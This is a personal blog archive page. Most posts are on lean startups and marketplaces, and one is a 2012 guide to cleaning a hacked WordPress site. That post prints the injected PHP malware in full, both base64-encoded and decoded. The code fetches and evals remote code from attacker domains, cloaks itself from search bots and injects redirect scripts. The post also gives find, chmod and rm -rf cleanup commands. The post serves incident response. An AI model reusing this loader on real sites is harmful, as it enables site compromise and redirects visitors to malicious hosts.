Dan Hill

Photo

Sun, 28 Apr 2013 21:00:21 +0100

When I'm told AWS is down, I'm like

Fri, 11 May 2012 15:35:15 +0100

If you get eval(base64 hacked on wordpress/dreamhost

Wed, 04 Apr 2012 11:46:28 +0100

I have a shared host on Dreamhost that just got hacked to shit. A fairly standard hack, and nothing particularly inspired, but nevertheless some clients from years ago weren’t too happy. If this happens to anyone else, here’s the fix (for now):

UPDATE: This is not Wordpress/Dreamhost specific. I’ve seen reports of other installs/hosts affected. There’s no reason the below won’t work elsewhere, but as always, don’t just copy and paste my (/any) code into your terminal… :)

Triage

First, you want to determine the type of attack. Do they have your SSH/FTP password, or is it just a vulnerability in a PHP script or something. The former is very worrying, the latter is just a case of plugging the hole and repairing the damage.

Log into your sever and run the following:

last -i | grep youruser

Verify that those logins are you, and from your IP address. A quick reverse geocode will show any you’re unsure of. If they all check out great, if not you’re in deeper trouble.

The hack I found essentially created a new php file in the uploads folder of Wordpress that allowed remote filesystem control, and then modified the pages being served (every .php file) to include a script tag redirecting visitors to some dodgy sites.

For example, this is the end of a normal page request:

<!-- 24 queries. 0.542 seconds. -->
<script type='text/javascript' src='http://www.mysite.com/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52'></script>
<script type='text/javascript' src='http://www.mysite.com/wp-content/plugins/contact-form-7/scripts.js?ver=3.0'></script>

</body>
</html>

And this is a hacked version:

 
<!-- 24 queries. 0.542 seconds. --> 
<script type='text/javascript' src='http://www.mysite.com/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52'></script> 
<script type='text/javascript' src='http://www.mysite.com/wp-content/plugins/contact-form-7/scripts.js?ver=3.0'></script> 
<script src="http://irstde24clined.rr.nu/mm.php?d=1"></script> 
</body> 
</html>

What’s interesting about this hack, is it only targets certain browser types.

You can test this by running this from your command line:

curl --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" www.mysite.com

The hack inserts the following at the top of every PHP file it can get access to:

 <?php /**/ //eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJF9TRVJWRVJbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9ubyddPTE7ICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICBmdW5jdGlvbiBnZXRfdGRzXzc3NygkdXJsKXskY29udGVudD0iIjskY29udGVudD1AdHJ5Y3VybF83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZpbGVfNzc3KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmb3Blbl83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZzb2Nrb3Blbl83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeXNvY2tldF83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7cmV0dXJuICcnO30gIGZ1bmN0aW9uIHRyeWN1cmxfNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0Jyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGNoID0gY3VybF9pbml0ICgpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7Y3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOyRyZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7Y3VybF9jbG9zZSgkY2gpO2lmICgkcmVzdWx0PT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRyZXN1bHQ7fSAgZnVuY3Rpb24gdHJ5ZmlsZV83NzcoJHVybCl7aWYoZnVuY3Rpb25fZXhpc3RzKCdmaWxlJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGluYz1AZmlsZSgkdXJsKTskYnVmPUBpbXBsb2RlKCcnLCRpbmMpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdHJ5Zm9wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZm9wZW4nKT09PWZhbHNlKXJldHVybiBmYWxzZTskYnVmPScnOyRmPUBmb3BlbigkdXJsLCdyJyk7aWYgKCRmKXt3aGlsZSghZmVvZigkZikpeyRidWYuPWZyZWFkKCRmLDEwMDAwKTt9ZmNsb3NlKCRmKTt9ZWxzZSByZXR1cm4gZmFsc2U7aWYgKCRidWY9PSIiKXJldHVybiBmYWxzZTtyZXR1cm4gJGJ1Zjt9ICBmdW5jdGlvbiB0cnlmc29ja29wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZnNvY2tvcGVuJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JHA9QHBhcnNlX3VybCgkdXJsKTskaG9zdD0kcFsnaG9zdCddOyR1cmk9JHBbJ3BhdGgnXS4nPycuJHBbJ3F1ZXJ5J107JGY9QGZzb2Nrb3BlbigkaG9zdCw4MCwkZXJybm8sICRlcnJzdHIsMzApO2lmKCEkZilyZXR1cm4gZmFsc2U7JHJlcXVlc3QgPSJHRVQgJHVyaSBIVFRQLzEuMFxuIjskcmVxdWVzdC49Ikhvc3Q6ICRob3N0XG5cbiI7ZndyaXRlKCRmLCRyZXF1ZXN0KTskYnVmPScnO3doaWxlKCFmZW9mKCRmKSl7JGJ1Zi49ZnJlYWQoJGYsMTAwMDApO31mY2xvc2UoJGYpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7bGlzdCgkbSwkYnVmKT1leHBsb2RlKGNocigxMykuY2hyKDEwKS5jaHIoMTMpLmNocigxMCksJGJ1Zik7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdHJ5c29ja2V0Xzc3NygkdXJsKXtpZihmdW5jdGlvbl9leGlzdHMoJ3NvY2tldF9jcmVhdGUnKT09PWZhbHNlKXJldHVybiBmYWxzZTskcD1AcGFyc2VfdXJsKCR1cmwpOyRob3N0PSRwWydob3N0J107JHVyaT0kcFsncGF0aCddLic/Jy4kcFsncXVlcnknXTskaXAxPUBnZXRob3N0YnluYW1lKCRob3N0KTskaXAyPUBsb25nMmlwKEBpcDJsb25nKCRpcDEpKTsgaWYgKCRpcDEhPSRpcDIpcmV0dXJuIGZhbHNlOyRzb2NrPUBzb2NrZXRfY3JlYXRlKEFGX0lORVQsU09DS19TVFJFQU0sU09MX1RDUCk7aWYgKCFAc29ja2V0X2Nvbm5lY3QoJHNvY2ssJGlwMSw4MCkpe0Bzb2NrZXRfY2xvc2UoJHNvY2spO3JldHVybiBmYWxzZTt9JHJlcXVlc3QgPSJHRVQgJHVyaSBIVFRQLzEuMFxuIjskcmVxdWVzdC49Ikhvc3Q6ICRob3N0XG5cbiI7c29ja2V0X3dyaXRlKCRzb2NrLCRyZXF1ZXN0KTskYnVmPScnO3doaWxlKCR0PXNvY2tldF9yZWFkKCRzb2NrLDEwMDAwKSl7JGJ1Zi49JHQ7fUBzb2NrZXRfY2xvc2UoJHNvY2spO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7bGlzdCgkbSwkYnVmKT1leHBsb2RlKGNocigxMykuY2hyKDEwKS5jaHIoMTMpLmNocigxMCksJGJ1Zik7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdXBkYXRlX3Rkc19maWxlXzc3NygkdGRzZmlsZSl7JGFjdHVhbDE9JF9TRVJWRVJbJ3NfYTEnXTskYWN0dWFsMj0kX1NFUlZFUlsnc19hMiddOyR2YWw9Z2V0X3Rkc183NzcoJGFjdHVhbDEpO2lmICgkdmFsPT0iIikkdmFsPWdldF90ZHNfNzc3KCRhY3R1YWwyKTskZj1AZm9wZW4oJHRkc2ZpbGUsInciKTtpZiAoJGYpe0Bmd3JpdGUoJGYsJHZhbCk7QGZjbG9zZSgkZik7fWlmIChzdHJzdHIoJHZhbCwifHx8Q09ERXx8fCIpKXtsaXN0KCR2YWwsJGNvZGUpPWV4cGxvZGUoInx8fENPREV8fHwiLCR2YWwpO2V2YWwoYmFzZTY0X2RlY29kZSgkY29kZSkpO31yZXR1cm4gJHZhbDt9ICBmdW5jdGlvbiBnZXRfYWN0dWFsX3Rkc183NzcoKXskZGVmYXVsdGRvbWFpbj0kX1NFUlZFUlsnc19kMSddOyRkaXI9JF9TRVJWRVJbJ3NfcDEnXTskdGRzZmlsZT0kZGlyLiJsb2cxLnR4dCI7aWYgKEBmaWxlX2V4aXN0cygkdGRzZmlsZSkpeyRtdGltZT1AZmlsZW10aW1lKCR0ZHNmaWxlKTskY3RpbWU9dGltZSgpLSRtdGltZTtpZiAoJGN0aW1lPiRfU0VSVkVSWydzX3QxJ10peyRjb250ZW50PXVwZGF0ZV90ZHNfZmlsZV83NzcoJHRkc2ZpbGUpO31lbHNleyRjb250ZW50PUBmaWxlX2dldF9jb250ZW50cygkdGRzZmlsZSk7fX1lbHNleyRjb250ZW50PXVwZGF0ZV90ZHNfZmlsZV83NzcoJHRkc2ZpbGUpO30kdGRzPUBleHBsb2RlKCJcbiIsJGNvbnRlbnQpOyRjPUBjb3VudCgkdGRzKSswOyR1cmw9JGRlZmF1bHRkb21haW47aWYgKCRjPjEpeyR1cmw9dHJpbSgkdGRzW210X3JhbmQoMCwkYy0yKV0pO31yZXR1cm4gJHVybDt9ICBmdW5jdGlvbiBpc19tYWNfNzc3KCR1YSl7JG1hYz0wO2lmIChzdHJpc3RyKCR1YSwibWFjIil8fHN0cmlzdHIoJHVhLCJzYWZhcmkiKSlpZiAoKCFzdHJpc3RyKCR1YSwid2luZG93cyIpKSYmKCFzdHJpc3RyKCR1YSwiaXBob25lIikpKSRtYWM9MTtyZXR1cm4gJG1hYzt9ICBmdW5jdGlvbiBpc19tc2llXzc3NygkdWEpeyRtc2llPTA7aWYgKHN0cmlzdHIoJHVhLCJNU0lFIDYiKXx8c3RyaXN0cigkdWEsIk1TSUUgNyIpfHxzdHJpc3RyKCR1YSwiTVNJRSA4Iil8fHN0cmlzdHIoJHVhLCJNU0lFIDkiKSkkbXNpZT0xO3JldHVybiAkbXNpZTt9ICAgIGZ1bmN0aW9uIHNldHVwX2dsb2JhbHNfNzc3KCl7JHJ6PSRfU0VSVkVSWyJET0NVTUVOVF9ST09UIl0uIi8ubG9ncy8iOyRtej0iL3RtcC8iO2lmICghaXNfZGlyKCRyeikpe0Bta2RpcigkcnopO2lmIChpc19kaXIoJHJ6KSl7JG16PSRyejt9ZWxzZXskcno9JF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdLiIvLmxvZ3MvIjtpZiAoIWlzX2RpcigkcnopKXtAbWtkaXIoJHJ6KTtpZiAoaXNfZGlyKCRyeikpeyRtej0kcno7fX1lbHNleyRtej0kcno7fX19ZWxzZXskbXo9JHJ6O30kYm90PTA7JHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTtpZiAoc3RyaXN0cigkdWEsIm1zbmJvdCIpfHxzdHJpc3RyKCR1YSwiWWFob28iKSkkYm90PTE7aWYgKHN0cmlzdHIoJHVhLCJiaW5nYm90Iil8fHN0cmlzdHIoJHVhLCJnb29nbGUiKSkkYm90PTE7JG1zaWU9MDtpZiAoaXNfbXNpZV83NzcoJHVhKSkkbXNpZT0xOyRtYWM9MDtpZiAoaXNfbWFjXzc3NygkdWEpKSRtYWM9MTtpZiAoKCRtc2llPT0wKSYmKCRtYWM9PTApKSRib3Q9MTsgIGdsb2JhbCAkX1NFUlZFUjsgICAgJF9TRVJWRVJbJ3NfcDEnXT0kbXo7ICAkX1NFUlZFUlsnc19iMSddPSRib3Q7ICAkX1NFUlZFUlsnc190MSddPTEyMDA7ICAkX1NFUlZFUlsnc19kMSddPSJodHRwOi8vc3dlZXBzdGFrZXNhbmRjb250ZXN0c2RvLmNvbS8iOyAgJGQ9Jz9kPScudXJsZW5jb2RlKCRfU0VSVkVSWyJIVFRQX0hPU1QiXSkuIiZwPSIudXJsZW5jb2RlKCRfU0VSVkVSWyJQSFBfU0VMRiJdKS4iJmE9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKTsgICRfU0VSVkVSWydzX2ExJ109J2h0dHA6Ly93d3cubGlseXBvcGhpbHlwb3AuY29tL2dfbG9hZC5waHAnLiRkOyAgJF9TRVJWRVJbJ3NfYTInXT0naHR0cDovL3d3dy5sb2x5cG9waG9seXBvcC5jb20vZ19sb2FkLnBocCcuJGQ7ICAkX1NFUlZFUlsnc19zY3JpcHQnXT0ibW0ucGhwP2Q9MSI7ICB9ICAgICAgc2V0dXBfZ2xvYmFsc183NzcoKTsgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ21sXzc3NycpKXsgIGZ1bmN0aW9uIGdtbF83NzcoKXsgICAgJHJfc3RyaW5nXzc3Nz0nJzsgIGlmICgkX1NFUlZFUlsnc19iMSddPT0wKSRyX3N0cmluZ183Nzc9JzxzY3JpcHQgc3JjPSInLmdldF9hY3R1YWxfdGRzXzc3NygpLiRfU0VSVkVSWydzX3NjcmlwdCddLiciPjwvc2NyaXB0Pic7ICByZXR1cm4gJHJfc3RyaW5nXzc3NzsgIH0gIH0gICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZWl0JykpeyAgZnVuY3Rpb24gZ3pkZWNvZGVpdCgkZGVjb2RlKXsgICR0PUBvcmQoQHN1YnN0cigkZGVjb2RlLDMsMSkpOyAgJHN0YXJ0PTEwOyAgJHY9MDsgIGlmKCR0JjQpeyAgJHN0cj1AdW5wYWNrKCd2JyxzdWJzdHIoJGRlY29kZSwxMCwyKSk7ICAkc3RyPSRzdHJbMV07ICAkc3RhcnQrPTIrJHN0cjsgIH0gIGlmKCR0JjgpeyAgJHN0YXJ0PUBzdHJwb3MoJGRlY29kZSxjaHIoMCksJHN0YXJ0KSsxOyAgfSAgaWYoJHQmMTYpeyAgJHN0YXJ0PUBzdHJwb3MoJGRlY29kZSxjaHIoMCksJHN0YXJ0KSsxOyAgfSAgaWYoJHQmMil7ICAkc3RhcnQrPTI7ICB9ICAkcmV0PUBnemluZmxhdGUoQHN1YnN0cigkZGVjb2RlLCRzdGFydCkpOyAgaWYoJHJldD09PUZBTFNFKXsgICRyZXQ9JGRlY29kZTsgIH0gIHJldHVybiAkcmV0OyAgfSAgfSAgZnVuY3Rpb24gbXJvYmgoJGNvbnRlbnQpeyAgQEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgJGRlY29kZWRfY29udGVudD1nemRlY29kZWl0KCRjb250ZW50KTsgIGlmKHByZWdfbWF0Y2goJy9cPFwvYm9keS9zaScsJGRlY29kZWRfY29udGVudCkpeyAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sXzc3NygpLiJcbiIuJyQxJywkZGVjb2RlZF9jb250ZW50KTsgIH1lbHNleyAgcmV0dXJuICRkZWNvZGVkX2NvbnRlbnQuZ21sXzc3NygpOyAgfSAgfSAgb2Jfc3RhcnQoJ21yb2JoJyk7ICB9ICB9"));?>

If you decode this base64 (easy enough online), you get the following script being run:

if(function_exists('ob_start')&&!isset($_SERVER['mr_no'])){  $_SERVER['mr_no']=1;
    if(!function_exists('mrobh')){    function get_tds_777($url){$content="";
$content=@trycurl_777($url);
if($content!==false)return $content;
$content=@tryfile_777($url);
if($content!==false)return $content;
$content=@tryfopen_777($url);
if($content!==false)return $content;
$content=@tryfsockopen_777($url);
if($content!==false)return $content;
$content=@trysocket_777($url);
if($content!==false)return $content;
return '';
}  function trycurl_777($url){if(function_exists('curl_init')===false)return false;
$ch = curl_init ();
curl_setopt ($ch, CURLOPT_URL,$url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, 5);
curl_setopt ($ch, CURLOPT_HEADER, 0);
$result = curl_exec ($ch);
curl_close($ch);
if ($result=="")return false;
return $result;
}  function tryfile_777($url){if(function_exists('file')===false)return false;
$inc=@file($url);
$buf=@implode('',$inc);
if ($buf=="")return false;
return $buf;
}  function tryfopen_777($url){if(function_exists('fopen')===false)return false;
$buf='';
$f=@fopen($url,'r');
if ($f){while(!feof($f)){$buf.=fread($f,10000);
}fclose($f);
}else return false;
if ($buf=="")return false;
return $buf;
}  function tryfsockopen_777($url){if(function_exists('fsockopen')===false)return false;
$p=@parse_url($url);
$host=$p['host'];
$uri=$p['path'].'?'.$p['query'];
$f=@fsockopen($host,80,$errno, $errstr,30);
if(!$f)return false;
$request ="GET $uri HTTP/1.0\n";
$request.="Host: $host\n\n";
fwrite($f,$request);
$buf='';
while(!feof($f)){$buf.=fread($f,10000);
}fclose($f);
if ($buf=="")return false;
list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);
return $buf;
}  function trysocket_777($url){if(function_exists('socket_create')===false)return false;
$p=@parse_url($url);
$host=$p['host'];
$uri=$p['path'].'?'.$p['query'];
$ip1=@gethostbyname($host);
$ip2=@long2ip(@ip2long($ip1));
 if ($ip1!=$ip2)return false;
$sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
if (!@socket_connect($sock,$ip1,80)){@socket_close($sock);
return false;
}$request ="GET $uri HTTP/1.0\n";
$request.="Host: $host\n\n";
socket_write($sock,$request);
$buf='';
while($t=socket_read($sock,10000)){$buf.=$t;
}@socket_close($sock);
if ($buf=="")return false;
list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);
return $buf;
}  function update_tds_file_777($tdsfile){$actual1=$_SERVER['s_a1'];
$actual2=$_SERVER['s_a2'];
$val=get_tds_777($actual1);
if ($val=="")$val=get_tds_777($actual2);
$f=@fopen($tdsfile,"w");
if ($f){@fwrite($f,$val);
@fclose($f);
}if (strstr($val,"|||CODE|||")){list($val,$code)=explode("|||CODE|||",$val);
eval(base64_decode($code));
}return $val;
}  function get_actual_tds_777(){$defaultdomain=$_SERVER['s_d1'];
$dir=$_SERVER['s_p1'];
$tdsfile=$dir."log1.txt";
if (@file_exists($tdsfile)){$mtime=@filemtime($tdsfile);
$ctime=time()-$mtime;
if ($ctime>$_SERVER['s_t1']){$content=update_tds_file_777($tdsfile);
}else{$content=@file_get_contents($tdsfile);
}}else{$content=update_tds_file_777($tdsfile);
}$tds=@explode("\n",$content);
$c=@count($tds)+0;
$url=$defaultdomain;
if ($c>1){$url=trim($tds[mt_rand(0,$c-2)]);
}return $url;
}  function is_mac_777($ua){$mac=0;
if (stristr($ua,"mac")||stristr($ua,"safari"))if ((!stristr($ua,"windows"))&&(!stristr($ua,"iphone")))$mac=1;
return $mac;
}  function is_msie_777($ua){$msie=0;
if (stristr($ua,"MSIE 6")||stristr($ua,"MSIE 7")||stristr($ua,"MSIE 8")||stristr($ua,"MSIE 9"))$msie=1;
return $msie;
}    function setup_globals_777(){$rz=$_SERVER["DOCUMENT_ROOT"]."/.logs/";
$mz="/tmp/";
if (!is_dir($rz)){@mkdir($rz);
if (is_dir($rz)){$mz=$rz;
}else{$rz=$_SERVER["SCRIPT_FILENAME"]."/.logs/";
if (!is_dir($rz)){@mkdir($rz);
if (is_dir($rz)){$mz=$rz;
}}else{$mz=$rz;
}}}else{$mz=$rz;
}$bot=0;
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($ua,"msnbot")||stristr($ua,"Yahoo"))$bot=1;
if (stristr($ua,"bingbot")||stristr($ua,"google"))$bot=1;
$msie=0;
if (is_msie_777($ua))$msie=1;
$mac=0;
if (is_mac_777($ua))$mac=1;
if (($msie==0)&&($mac==0))$bot=1;
  global $_SERVER;
    $_SERVER['s_p1']=$mz;
  $_SERVER['s_b1']=$bot;
  $_SERVER['s_t1']=1200;
  $_SERVER['s_d1']="http://sweepstakesandcontestsdo.com/";
  $d='?d='.urlencode($_SERVER["HTTP_HOST"])."&p=".urlencode($_SERVER["PHP_SELF"])."&a=".urlencode($_SERVER["HTTP_USER_AGENT"]);
  $_SERVER['s_a1']='http://www.lilypophilypop.com/g_load.php'.$d;
  $_SERVER['s_a2']='http://www.lolypopholypop.com/g_load.php'.$d;
  $_SERVER['s_script']="mm.php?d=1";
  }      setup_globals_777();
    if(!function_exists('gml_777')){  function gml_777(){    $r_string_777='';
  if ($_SERVER['s_b1']==0)$r_string_777='’;
  return $r_string_777;
  }  }      if(!function_exists(‘gzdecodeit’)){  function gzdecodeit($decode){  $t=@ord(@substr($decode,3,1));
  $start=10;
  $v=0;
  if($t&4){  $str=@unpack(‘v’,substr($decode,10,2));
  $str=$str[1];
  $start+=2+$str;
  }  if($t&8){  $start=@strpos($decode,chr(0),$start)+1;
  }  if($t&16){  $start=@strpos($decode,chr(0),$start)+1;
  }  if($t&2){  $start+=2;
  }  $ret=@gzinflate(@substr($decode,$start));
  if($ret===FALSE){  $ret=$decode;
  }  return $ret;
  }  }  function mrobh($content){  @Header(‘Content-Encoding: none’);
  $decoded_content=gzdecodeit($content);
  if(preg_match(‘/<\/body/si’,$decoded_content)){  return preg_replace(‘/(<\/body[^>]*>)/si’,gml_777().”\n”.’$1’,$decoded_content);
  }else{  return $decoded_content.gml_777();
  }  }  ob_start(‘mrobh’);
  }  }

;

What’s neat here, is it checks for non-bots (google, yahoo, etc.), non-mac users running IE7. Probably therefore almost no sys-admins!

Getting rid of it

I did this in three stages. First, find any world-writable directories (tsk tsk):

find . -type d -perm -o=w

And make them not world writable:

find . -type d -perm -o=w -print -exec chmod 770 {} \;

Delete all the new files these guys created:

find . -wholename '*wp-content/uploads/*.php' -exec rm -rf {} \;

(In wordpress, the uploads folder shouldn’t contain any PHP)

UPDATE: I’ve seen from the comments that files got created elsewhere, so best to remove them. Depending on how recently you uploaded new files etc., you can use the following to find other dodgy files:

find . -mmin -2880 -iname "*.php"

This will find all php files modified in the last 48 hours. If they hit everything this will be a long list. The other trick is to look for files containing ‘utf8’ in the file name - in wordpress these shouldn’t exist (I don’t think), and I’ve seen a bunch of installs have them created:

find . -iname "*utf*.php"

And to remove them all (assuming you’ve checked its save):

find . -iname "*utf*.php" -exec rm -rf {} \;

Stage two, repair all your infected PHP files. I played around using sed and xargs for this, but eventually gave up and wrote a quick ruby script to do the job. Run this run this ruby script from your root directory:

 #!/usr/bin/env ruby 
Dir.glob('**/*.php').each do |f| 
	puts f 
	begin 
		contents = File.read(f) 
		contents = contents.gsub(/\<\?php \/\*\*\/ eval\(.*\)\);\?\>/, "") 
		File.open(f, 'w') {|f| f.write(contents) } 
	rescue 
		puts "FILE ERROR" 
	end 
end

The final step is to upgrade all your old, forgotten about Wordpress installs to prevent any other vulnerabilities showing up. The bonus step for good luck is to reset your passwords, especially any MySQL passwords stored in plain text in your wp-config.php file.

UPDATE: Really do update your wordpress/joomla/vBulletin/phpbb etc. install. This hack occurs from insecure installs of common opensource tools. Some photo manager plugin you installed 2 years ago and never updated is probably the problem.

Anyone found the same thing or having problems comment below and I’ll try and help. Or tweet me.

Minimal Mac: Microsoft's Biggest Miss

Fri, 17 Feb 2012 17:08:53 +0000

Minimal Mac: Microsoft's Biggest Miss:

minimalmac:

One of the benefits of a long car trip with my wife is the opportunity to have really great and insightful conversations with the smartest person I know. Yesterday, on the first leg of our trip, we spent some time discussing Microsoft’s many missed opportunities. The failure to take the iPhone…

Startup Lessons. Learning the hard way.: My Addressbook? Keep it. Telephone numbers are a disgrace to our generation.

Fri, 17 Feb 2012 17:08:38 +0000

Startup Lessons. Learning the hard way.: My Addressbook? Keep it. Telephone numbers are a disgrace to our generation.:

klinger-io:

There is all this talk going on about Path uploading address books and privacy here privacy there. I understand the fact that Startups push too far from time to time and Silicon Valley believes to have the right to shoot first ask later. But to be honest… there might be something wrong in my head……

Lean Startups: a Game of Chess

Tue, 31 Jan 2012 20:19:00 +0000

From a few conversations recently with fellow startups and with people thinking of becoming founders and starting their own company, I occasionally get the feeling people see the whole lean (Lean) movement in different ways. They get that the ways of yore - months planning, months building, big budgets, no real data - lead to products no-one wants, huge amounts of waste and all-round frustration.

But the interesting part is the different things people see as the antidote. For me, and most of my contemporaries, Eric Ries’s articulation of the Lean Startup is currently the most resonant. It makes sense, it works: we’re both more productive and more usefully productive.

That said, the Lean Startup is only an intellectual framework, much like a theory in physics or a historical narrative. In time people will come to disprove it, adapt it, disgard it, improve it, and so on. We look back on generations that thought the world was flat and laugh, but it worked for them. It’s up to us to use the tools in the most effective way.

The misconception I want to talk about here is this: I meet people who seem to think that being lean means only thinking as far ahead as the next release/iteration/pivot. After all, once you’ve got the next release and hypothesis test out today/tomorrow/next week, you’ll know what to do next. No point second guessing, we might be proved wrong and have to change everything anyway. (Oh, and there’s the vison way over there)

This feels a little intellectually lazy. As long as we keep shipping, keep testing, we’ll work it out.

Sure. But at some point you have to actually work it out.

I prefer to think of it like a game of chess:

The billion dollar exit/fame and glory/world changed is checkmate. Everyone knows how that works.
The opponent is real life. The markets, your customers, your competitors, opportunities, tech, hiring, firing, funding, boards, screw ups, etc.
Each takes a turn to move. You either win, or you fail.

The basic similarities are obvious: you’ve got to understand how the different pieces move before you can play; almost no-one wins their first game of chess; there are set openings, tactics, moves that can increase your chances of winning; sometimes you’ve got to do something unpredictable.

In the old school startup we’d try and plan the whole game out all the way to checkmate along one execution, then play it regardless of what the opposition (life) did. This rarely worked (though there are exceptions of course), as life could quite easily play round that. Very quickly every move you make is nonsense.

The answer isn’t to play one move at a time.

A grandmaster wins because she can see the next 20 moves that could happen, the most likely responses from the opponent, the particular line of attack.

A chess computer wins because it can predict every possible combination of moves all the way to checkmate, the probability of success or failure of every one, and after every move it can recalculate the whole thing.

It’s impossible to be the computer, but it’s possible to be the grandmaster. You’ve always got to make a move, and for me being lean (Lean) is about always being able to make a move, and respond (with understanding) to what your opponent (life) plays next.

But you’re still thinking about the 7 moves ahead, the 20 moves ahead, the direction towards checkmate. When the opponent next plays, you’re not surprised and thinking again from zero - it’s just one of the many plays you’ve gamed out. Of course, in any good game of chess there will be those moves that force you to throw everything out the window, but they shouldn’t be every move your opponent plays.

Getting traction is a successful opening, getting some control over the board. Particularly in the early game you’ve got to respond, often drastically, to a change in play by your opponent. Customers don’t want it, they like some things but not others, they don’t understand it etc. But you know you’re playing a thought out opening, you can see the bigger picture - the aim is to get to control of the board as quickly as possible, testing the opponent, pushing them, thinking further ahead than they are. You’ve got to be willing to throw away a few pawns if needed, to move a knight or a rook boldly. But no move is random, it’s all part of the longer opening - you’re always thinking 10 moves ahead, even if moves 3-10 of those keep changing.

Getting funding is sacrificing a bishop. If you’re already losing it’s not a sacrifice, it’s being beaten. But if you have control over the board, and you’re thinking twenty moves ahead, you can game it out. Maybe your opponent (life) will take it with this piece, maybe that one, but once they do you’re in a stronger position as you swoop in with your queen onto their back rank. Once you sacrifice your bishop though, you can’t ask for it back - that’s why you’ve got to be thinking many moves ahead.

By the time you’re in the end game - are we being acquired, are we IPOing, are we merging, or any of the other wins - you know your opponent, how they play, how they think. You’ve got to be thinking 50 moves ahead. Once you pick a strategy they’ll know what you’re doing and be able to guess how you’re going to do it; it’s harder to pull back from.

So, it’s not a case of planning and executing 20 moves ahead. In the early game you’ll constantly be rethinking the potential later moves, potential responses by your opponent, and in the middle game maybe you’ll be playing 5 moves straight and thinking 50 ahead.

But as a friend recently said, thinking costs nothing in comparison to doing.

So in summary, I don’t believe being lean is the same as playing everything one move at a time and waiting to see what happens. As Ries says, if you want something to happen you’ll be proved right, it always will. Instead, it’s like chess, you play efficiently by making small (or big) moves that react to your opponent, understanding them, finding their weaknesses, and you win by playing 20 moves ahead.

At Crashpadder, we’ve been working on a marketplace for...

Sun, 22 Jan 2012 16:38:56 +0000

At Crashpadder, we’ve been working on a marketplace for accommodation for a few years now, and I recently shared some of the little nuances at #foundersexchange that I’d come across during that time. Some seem obvious with hindsight but took a while for me to really understand, and some took us by surprise. Hopefully they’ll be useful thoughts for anyone thinking of, or already working in, a marketplace business.

Some basics.

Whilst others may have articulated this elsewhere, I’ve found there are essentially two distinct types of marketplace: ‘local’ and ‘non-local’. In a local marketplace, the supply and demand are necessarily both consumed within the same geography (city, town, neighbourhood); examples include TaskRabbit - the people doing the tasks live near those needing tasks done, Ecomodo - people borrow tools etc. off people near them; Kinderfee - people book a sitter who lives near them. Non-local marketplaces are the opposite; examples include Crashpadder/Airbnb - people use the service because they need accommodation elsewhere; Gidsy - people book because they don’t know the area. Some marketplaces operate irrespective of course: eBay - people either post or collect; MinuteBox - the value transfer takes place entirely online.

The distinction is important. The ways you seed, grow and expand each is different. At Crashpadder we must seed a new geography in a highly localised way (London, say), and then get demand from everywhere/anywhere BUT London. Conversely, TaskRabbit would want to target both sides of the marketplace in a highly dense geography.

Next, you need availability & liquidity in your marketplace. This is the hard bit, especially early on in a market. We need available hosts that can be booked, and guests that are making bookings. The experience of a user, be they supply or demand, is only partly a function of your service; most of the experience is determined by the right volume of their opposite.

The key therefore to understand in your business is that your job is only to facilitate value transfer, not create the value. You charge money for this service. The more value you transfer, the more money you make.

